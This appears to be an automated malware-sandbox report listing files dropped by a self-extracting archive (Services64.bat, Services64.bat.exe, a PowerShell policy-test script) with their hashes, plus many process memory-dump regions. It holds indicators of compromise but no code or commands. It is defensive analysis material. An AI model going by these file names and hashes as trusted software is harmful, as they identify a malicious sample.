bc7618a3d941d3df36fc2167ec24835444e4ade3256f953891d800a1496de73a269eeb196a102eb87f103607021f0b971606587c98e1bfe59b3fd20f11028a14

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat

Filesize
238KB

MD5
b9ca345ef71ae3911e20797eb0aa672d

SHA1
603101eb7fd4c628d71d710f92c70caed976a9f4

SHA256
ade666928768de996b1fc03f1bf0ac8dde70809c5f3ab70f7c1b69ad0a92678b

SHA512
c3e17faa7f7ff67766010573b73bcb93e623371e7d8fda5cc75ed84265f6ab31c5959053fc0117125a5bf4730691c8cb880165116e6f46bda3d6ace922533b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Services64.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services64.bat

Filesize
238KB

MD5
b9ca345ef71ae3911e20797eb0aa672d

SHA1
603101eb7fd4c628d71d710f92c70caed976a9f4

SHA256
ade666928768de996b1fc03f1bf0ac8dde70809c5f3ab70f7c1b69ad0a92678b

SHA512
c3e17faa7f7ff67766010573b73bcb93e623371e7d8fda5cc75ed84265f6ab31c5959053fc0117125a5bf4730691c8cb880165116e6f46bda3d6ace922533b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services64.bat

Filesize
238KB

MD5
b9ca345ef71ae3911e20797eb0aa672d

SHA1
603101eb7fd4c628d71d710f92c70caed976a9f4

SHA256
ade666928768de996b1fc03f1bf0ac8dde70809c5f3ab70f7c1b69ad0a92678b

SHA512
c3e17faa7f7ff67766010573b73bcb93e623371e7d8fda5cc75ed84265f6ab31c5959053fc0117125a5bf4730691c8cb880165116e6f46bda3d6ace922533b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services64.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services64.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services64.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u5sxtzrl.5ey.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/212-211-0x0000000002390000-0x00000000023A0000-memory.dmp

Filesize
64KB

Download
memory/212-210-0x0000000002390000-0x00000000023A0000-memory.dmp

Filesize
64KB

Download
memory/212-222-0x000000007F260000-0x000000007F270000-memory.dmp

Filesize
64KB

Download
memory/212-223-0x0000000002390000-0x00000000023A0000-memory.dmp

Filesize
64KB

Download
memory/212-212-0x000000006FA00000-0x000000006FA4C000-memory.dmp

Filesize
304KB

Download
memory/1068-143-0x0000000005450000-0x0000000005A78000-memory.dmp

Filesize
6.2MB

Download
memory/1068-146-0x0000000004E10000-0x0000000004E20000-memory.dmp

Filesize
64KB

Download
memory/1068-158-0x0000000006140000-0x000000000615E000-memory.dmp

Filesize
120KB

Download
memory/1068-142-0x0000000002B60000-0x0000000002B96000-memory.dmp

Filesize
216KB

Download
memory/1068-148-0x0000000005B80000-0x0000000005BE6000-memory.dmp

Filesize
408KB

Download
memory/1068-259-0x0000000004E10000-0x0000000004E20000-memory.dmp

Filesize
64KB

Download
memory/1068-144-0x00000000051C0000-0x00000000051E2000-memory.dmp

Filesize
136KB

Download
memory/1068-145-0x0000000004E10000-0x0000000004E20000-memory.dmp

Filesize
64KB

Download
memory/1068-165-0x0000000004E10000-0x0000000004E20000-memory.dmp

Filesize
64KB

Download
memory/1068-159-0x0000000004E10000-0x0000000004E20000-memory.dmp

Filesize
64KB

Download
memory/1068-147-0x0000000005320000-0x0000000005386000-memory.dmp

Filesize
408KB

Download
memory/1068-163-0x00000000073A0000-0x000000000743C000-memory.dmp

Filesize
624KB

Download
memory/1068-164-0x0000000004E10000-0x0000000004E20000-memory.dmp

Filesize
64KB

Download
memory/1068-161-0x0000000007280000-0x000000000729A000-memory.dmp

Filesize
104KB

Download
memory/1068-258-0x0000000004E10000-0x0000000004E20000-memory.dmp

Filesize
64KB

Download
memory/1068-257-0x0000000007AC0000-0x0000000007ACA000-memory.dmp

Filesize
40KB

Download
memory/1068-166-0x0000000004E10000-0x0000000004E20000-memory.dmp

Filesize
64KB

Download
memory/1068-256-0x0000000008340000-0x00000000083D2000-memory.dmp

Filesize
584KB

Download
memory/1068-255-0x0000000008710000-0x0000000008CB4000-memory.dmp

Filesize
5.6MB

Download
memory/1068-160-0x0000000007AE0000-0x000000000815A000-memory.dmp

Filesize
6.5MB

Download
memory/1088-248-0x0000000005330000-0x0000000005340000-memory.dmp

Filesize
64KB

Download
memory/1088-247-0x000000007F6F0000-0x000000007F700000-memory.dmp

Filesize
64KB

Download
memory/1088-237-0x000000006FA00000-0x000000006FA4C000-memory.dmp

Filesize
304KB

Download
memory/1088-235-0x0000000005330000-0x0000000005340000-memory.dmp

Filesize
64KB

Download
memory/1088-234-0x0000000005330000-0x0000000005340000-memory.dmp

Filesize
64KB

Download
memory/1288-300-0x0000019C79660000-0x0000019C79670000-memory.dmp

Filesize
64KB

Download
memory/1288-302-0x0000019C79660000-0x0000019C79670000-memory.dmp

Filesize
64KB

Download
memory/1288-301-0x0000019C79660000-0x0000019C79670000-memory.dmp

Filesize
64KB

Download
memory/1288-287-0x0000019C79660000-0x0000019C79670000-memory.dmp

Filesize
64KB

Download
memory/1288-299-0x0000019C79660000-0x0000019C79670000-memory.dmp

Filesize
64KB

Download
memory/2044-196-0x0000000007590000-0x000000000759E000-memory.dmp

Filesize
56KB

Download
memory/2044-194-0x00000000073B0000-0x00000000073BA000-memory.dmp

Filesize
40KB

Download
memory/2044-177-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/2044-198-0x00000000075E0000-0x00000000075E8000-memory.dmp

Filesize
32KB

Download
memory/2044-178-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/2044-197-0x00000000075F0000-0x000000000760A000-memory.dmp

Filesize
104KB

Download
memory/2044-180-0x00000000065E0000-0x0000000006612000-memory.dmp

Filesize
200KB

Download
memory/2044-181-0x000000006FA00000-0x000000006FA4C000-memory.dmp

Filesize
304KB

Download
memory/2044-195-0x0000000007630000-0x00000000076C6000-memory.dmp

Filesize
600KB

Download
memory/2044-191-0x00000000065C0000-0x00000000065DE000-memory.dmp

Filesize
120KB

Download
memory/2044-193-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/2044-192-0x000000007EF60000-0x000000007EF70000-memory.dmp

Filesize
64KB

Download
memory/4200-265-0x000001BD1DCA0000-0x000001BD1DCB0000-memory.dmp

Filesize
64KB

Download
memory/4200-280-0x000001BD1DCA0000-0x000001BD1DCB0000-memory.dmp

Filesize
64KB

Download
memory/4200-279-0x000001BD1DCA0000-0x000001BD1DCB0000-memory.dmp

Filesize
64KB

Download
memory/4200-277-0x000001BD1DCA0000-0x000001BD1DCB0000-memory.dmp

Filesize
64KB

Download
memory/4200-275-0x000001BD1FD50000-0x000001BD1FD72000-memory.dmp

Filesize
136KB

Download